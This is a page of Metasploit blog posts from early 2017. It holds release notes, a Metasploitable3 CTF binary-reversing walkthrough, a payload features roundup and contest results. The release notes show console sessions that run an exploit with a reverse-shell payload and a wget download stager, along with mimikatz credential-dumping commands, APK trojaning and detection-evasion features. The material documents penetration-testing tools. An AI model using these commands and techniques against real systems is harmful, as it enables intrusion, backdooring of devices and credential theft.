Skip navigation
All Places > Metasploit > Blog > 2017 > January
2017
egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 27, 2017

Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

 

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

 

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

 

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

 

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

 

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the `dump_contacts` command now gives you the option of a normal text file, CSV, or vCard for the output format.

 

Here's how to use it:

 

meterpreter > dump_contacts -h
Usage: dump_contacts [options]
Get contacts list.

OPTIONS:

    -f   Output format for contacts list (text, csv, vcard)
    -h        Help Banner
    -o   Output path for contacts list


meterpreter > dump_contacts -f csv
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174248.csv
meterpreter > dump_contacts -f vcard
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174258.vcf

 

 

wget/curl command stagers

 

 

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

 

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

 

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

 

Here's an example of setting CMDSTAGER::FLAVOR:

 

msf > use exploit/linux/http/apache_continuum_cmd_exec 
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129
rhost => 192.168.33.129
msf exploit(apache_continuum_cmd_exec) > set payload
linux/x64/mettle_reverse_tcp 
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget 
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P
[*] Meterpreter session 1 opened (192.168.33.1:4444 ->
192.168.33.129:55171) at 2017-01-27 13:27:54 -0600
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > 

 

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

 

 

History command

Metasploit stores your msfconsole history in ~/.msf4/history but sometimes you only want dump out pieces of it. The new history command works similarly to the bash command of the same name letting you do just that.

 

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

 

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace
   default
   fbi
  * nasa
   wh.gov
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v
  Workspaces
  ==========
  current  name     hosts  services  vulns  creds  loots  notes
  -------  ----     -----  --------  -----  -----  -----  -----
           default  5      2         3      3      0      8
           fbi      98     165       49     155    301    72
  *        nasa     32     81        41     14     33     20
           wh.gov   1      9         0      0      0      0

11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >

 

 

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

 

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options
  Module options (payload/windows/meterpreter/reverse_https):
     Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The local listener hostname
    LPORT     8443             yes       The local listener port
    LURI                       no        The HTTP Path
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1
LHOST => 192.168.99.1
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > 
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888
LPORT => 8888
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler
[*] Payload Handler Started as Job 2
[*] Started HTTPS reverse handler on https://0.0.0.0:8888
[*] Starting the payload handler...
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v
  Jobs
  ====
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts
   --  ----                    -------                            ------------               -------  ----------                 ------------
   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888

 

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

 

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

 

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands
=============

    Command                Description
    -------                -----------

    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

 

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

 

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

king.jpgMetasploitable3 is a free virtual machine that we have recently created to allow people to simulate attacks using Metasploit. In it, we have planted multiple flags throughout the whole system; they are basically collectable poker card images of some of the Rapid7/Metasploit developers. Some are straight-forward and easy to open, some are hidden, or obfuscated, etc. Today, we would like to share the secret to unlocking one of these cards: the King of Clubs.

 

The King of Clubs is one of the fun flags to extract. This card can be found in the C:\Windows\System32 directory, and it's an executable. To retrieve it, you will need to compromise the host first. In this demonstration, we will SSH into the host. And when calling the King of Clubs executable, we are greeted with the following riddle:

 

Screen Shot 2016-12-06 at 12.11.42 AM.png

 

Binary Analysis

 

Obviously, this executable requires a closer examination. So ideally, you want to download this binary somewhere to your favorite development/reversing environment:

 

Screen Shot 2016-12-06 at 12.14.08 AM.png

 

If you attempt to look at the executable with a debugger, you will notice that the binary is packed, which makes it difficult to read. There are multiple ways to figure out what packer is used for the executable. Either you will most likely discover it by inspecting the PE structure, which contains multiple UPX sections. Or you can use PEiD to tell you:

 

Screen Shot 2016-12-05 at 2.43.15 PM.png

 

UPX is a binary compression tool that is commonly used by malware to make reverse engineering a little bit more difficult. It is so common you can find an unpacker pretty easily, as well. In this example, we are using PE Explorer because it's free. PE Explore will automatically recognize our binary is packed with UPX, and unpack it. So all you have to do is open the binary with it and click save:

 

Screen Shot 2016-12-05 at 2.45.31 PM.png

 

There, that wasn't too painful. Was it?

 

At this point, we are ready to read the binary with a disassembler. Let's start with the main function:

 

Screen Shot 2016-12-05 at 2.49.20 PM.png

 

As we can see, the first thing the program does is checking if there is a debugger attached or not. If there it, then the program exits:

 

Screen Shot 2016-12-05 at 2.49.00 PM.png

 

If you are doing dynamic analysis, don't forget to disable this :-)

 

The next thing it does is checking if the current user is "hdmoore" or not. If yes, then it writes a card to disk. If not, it prints out the riddle that we saw previously:

 

Screen Shot 2016-12-05 at 2.49.00 PM copy.png

 

Let's look at how the card is created a little more. First off, we see that the constructor of the Card class initializes something with the value 0x0f, this piece of information is important for later:

 

Screen Shot 2016-12-05 at 3.06.09 PM.png

 

After the initialization, our main function calls the writeCard function.

 

The writeCard function does two things. First, it iterates through a big chunk of data of 76473h bytes, XORing each byte. If you pay attention to where EAX comes from, which is [EBP+ARG_0], you should remember that it's the value the Card class initialized. So this means, the writeCard function is XORing a big chunk of data with 0x0F:

 

Screen Shot 2016-12-05 at 3.08.59 PM.png

 

After the function is done XORing, it's ready to write the data to disk using ofstream. The first argument of ofstream's open function reveals that we are trying to write a file named "king_of_clubs.png":

 

Screen Shot 2016-12-05 at 3.12.39 PM.png

 

After the file is written, we are at the end of the function, and that leads us to the end of the program.

 

Ways to Extraction

 

Now that we understand how the program works, we have some options to extract the XOR'd image from the binary

 

  • Since IDA already tells us where the XOR'd PNG data is at, we can extract 76474h bytes, and then XOR back the data with 0x0f.
  • Bypass the IsDebuggerPresent call with OllyDBG, and modify the JNZ jump for strcmp, which will force the program to always produce the card.
  • This is probably the easier one: Create a user named "hdmoore", run the program again:

 

Screen Shot 2016-12-06 at 12.32.50 AM.png

 

And that's how you reverse engineer the challenge. Now, go ahead and give this a try, and see who the King of Clubs is. If you like this challenge, don't feel shy to try the other 14 Metasploitable3 flags as well :-)

 

If you haven't tried Metasploitable3 but finally want to get your hands dirty, you can get it here. Keep in mind that Metasploitable3 is a vulnerable image that's heavily exploitable by Metasploit, so if you don't have Metasploit, you should download that and put it in your tool box :-)

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

 

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

 

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

 

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager

 

On the second day of Haxmas, Tim gave us two Android Services

 

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose a your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

 

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now setup a locally-visible service via a Meterpreter session that visible to your target users. This is a nice complement to standard port forwarding that has been available with Meterpreter sessions for some time.

 

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'.  Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your your choosing.

 

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system.

 

This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to confortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capaibilites built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017.

 

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But, getting data from applications can be trickier. Many Android applications use SQLite for data storage however, and armed with the combination of a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

 

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

 

On the eight day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

 

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash.

 

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

 

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpr eters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well it works as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

 

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealty operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.

 

Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!


The Metasploitable3 CTF competition has wrapped up and we have our winners!  We had almost 300 flag submissions from more than 50 fine folks.  There were some really great right-ups submitted with great details on how flags were found.  Thanks to everyone who took time to submit a finding!  ON TO THE RESULTS!

 

When we announced the competition, we didn't specify if team submissions were allowed or not.  Well, it turns out that  a team was in the top 3.  Team RUNESEC went bonkers and submitted all 15 flags over the course of 4 days.  Nice work RUNESEC.   We didn't want anyone to feel slighted so we decided to go ahead and (in the spirit of the season) be generous .   Therefore, Team RUNESEC will receive a 2nd place prize as they were second to submit all the flags.  Additionally, the Top-3 individual submitters will receive prizes.

 

These winners showed some tremendous talent and skill.  Vaibhav completed just 7 days after the contest was announced and Jonathan completed all the flags in roughly 12 hours!  A total of 4 individuals completed the challenge, based on reviews of the write-ups, and time of completion we have the top 3 winners.

 

Top Individual Submitters

1st Place, Hak5 Pineapple: Vaibhav Deshmukh

2nd Place, LAN Turtle or Lock Pick Set: Igor Guarisma

3rd Place, LAN Turtle or Lock Pick Set: Jonathan Echavarria

 

Top Team Submitter

1st Place, LAN Turtle or Lock Pick Set: Team RUNESEC

 

Here is a break down of the top-10 submitters, please note that the grouping by count doesn't reflect overall standings, just the number of valid flags submitted.

 

Top 10 Submitters

2016-12-29_15-59-36.png

 

Great work everyone!

 

The card most frequently found where:

2016-12-29_15-28-56.png

 

The card most likely to be found first?  The Joker.

 

yougeta.gif

We will be contacting the winners directly over the next few weeks to arrange delivery of the prizes.  And... as an added bonus EVERYONE who submitted a valid flag will get a Metasploit t-shirt!!

 

Thanks again to everyone who participated, we've had a great time reviewing all the very creative and well-written submissions.  Going forward we will continue to add new and fun flags to Metasploitable3 as always, we'll keep you posted when we have some new flags to discover.  We will also be adding new options to exploit Metasploitable3 as they emerge.   If you have any ideas or things you'd like to see in future iterations of Metasploitable3 please feel free to comment on our Git page.  Metasploitable3 is an open source project so, if you're up to it, you can submit a pull request with any of your own ideas!  Check out the repo on git.

 

I'd like to give a special thanks to sinn3r for all of his great work judging submissions and helping out everyone with questions.

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Breaking Records and Breaking Business

2016 brought plenty of turmoil, and InfoSec was no exception:

  • Largest data breach: Largest breach ever, affecting more than 1 billion Yahoo users. And they were not alone: Oracle, LinkedIn, the Department of Justice, SnapChat, Verizon, DropBox, the IRS --- many organizations experienced, or discovered (or finally revealed the true extent of...), massive breaches this year.
  • Record-breaking denial of service attacks: law enforcement efforts targeting DDoS-as-a-Service providers are encouraging, but Mirai achieved record-breaking DDoS attacks this year. It turns out those easy-to-take-for-granted devices joining the Internet of Things in droves can pack quite a punch.
  • Ransomware: the end of 2015 saw a meteoritic rise in the prevalence of ransomware, and this continued in 2016. Healthcare and other targeted industries have faced 2-4x as many related attacks this year, some via increased coverage of ransomware in exploits kits, but mostly through plain old phishing.

 

Businesses and individuals continue to face new and increasing threats in keeping their essential systems and data secure. A static defense will not suffice: they must increase in both awareness and capability regularly in order to form a robust security program.

 

Metasploit Framework has grown in many ways during 2016, both through the broader community and through Rapid7 support. Let's look back through some of the highlights:

 

More exploits

A surprisingly wide range of exploits were added to Metasploit Framework in 2016:

  • Network management: NetGear, OpenNMS, webNMS, Dell, and more
  • Monitoring and backup: Nagios XI, Exagrid
  • Security: ClamAV, TrendMicro, Panda, Hak5 Pineapple, Dell SonicWall, Symantec -- and Metasploit itself!
  • Mainframes, SCADA dashboards
  • Exploit Kits: Dark Comet, Phoenix
  • ExtraBACON; StageFright
  • Content management/web applications: Joomla, TikiWiki, Ruby on Rails, Drupal, Wordpress forms
  • Docker, Linux kernel, SugarCRM, Oracle test suite, Apache Struts, exim, Postgres, and many more!

 

More flexibility

Metasploit Framework provides many supporting tools, aside from those designed to get a session on a target. These help in collecting information from a wide variety of systems, staying resilient to unknown and changing network environments, and looking like you belong.

 

Some expansions to the toolbox in 2016 included:

 

By the Numbers

Nearly 400 people have contributed code to Metasploit Framework during its history. And speaking of history: Metasploit Framework turned 13 this year! Long long ago, in a console (probably not too) far away:

msf-2.2.png

Metasploit Framework 2.2 - 30 exploits

 

Has much changed in the last 12 years? Indeed!

msf-4.13.8.png

Metasploit Framework 4.13.8 - 1607 exploits

 

In 2016, Metasploit contributors added over 150 new modules. Metasploit Framework's growth is powered by Rapid7, and especially by the community of users that give back by helping the project in a variety of ways, from landing pull requests to finding flags.

 

Topping the list of code contributors in 2016: Wei Chen (sinn3r), Brent Cook, William Vu (wvu), Dave Maloney (thelightcosine), h00die, OJ Reeves, nixawk, James Lee (egypt), Jon Hart, Tim Wright, Brendan Watters, Adam Cammack, Pedro Ribeiro, Josh Hale (sn0wfa11), and Nate Caroe (TheNaterz).

 

The Metasploit Framework GitHub project is approaching 4700 forks, and ranks in the top 10 for Ruby projects once again. It's also the second most starred security project on GitHub. None of this would have been possible if not for the dedication and drive of the Metasploit community. Together, we can continue to highlight flaws in existing systems, and better test the essential software of tomorrow. John Locke voiced in 1693 what open source security supporters continue to know well today: "The only fence against the world is a thorough knowledge of it."

 

So what about you?

Filter Blog

By date: By tag: